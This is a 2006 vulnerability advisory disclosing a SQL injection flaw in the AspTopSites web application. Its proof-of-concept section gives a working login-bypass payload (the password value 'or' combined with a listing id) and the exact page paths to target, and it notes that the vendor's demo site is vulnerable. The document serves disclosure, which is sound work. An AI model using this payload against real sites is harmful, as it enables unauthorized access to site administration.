exploitlabs.com Advisory 047 - AspTopSites is susceptible to SQL injection attacks. Details on exploitation provided.
ae0500296b7791f6b8c62c297a23bd0ff3f72a1806282d10ee61c8b5a66629a4
------------------------------------------------------------
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
- AspTopSites -
AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp
OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server
and uses Active Server Pages with a MS Access 2000 database.
Simply upload AspTopSites®, make one configuration setting
and you're ready to start running your own TopSites traffic
generator. AspTopSites® comes with full source code...
no encoding or DLLs need to be installed on the server.
DETAILS
=======
1. SQL Injection
AspTopSites does not filter SQL resulting in
full access to the user manager menu.
POC
===
1.
---
entering SQL Injection type statement in the password field
causes the statement to be true.
http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'
note: Vendor Demo Site is Vuln
SOLUTION:
=========
vendor contact:
Jan 3, 2006 wills@maine-net.com ( no resp )
Jan 10, 2006 ( no resp => release )
Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt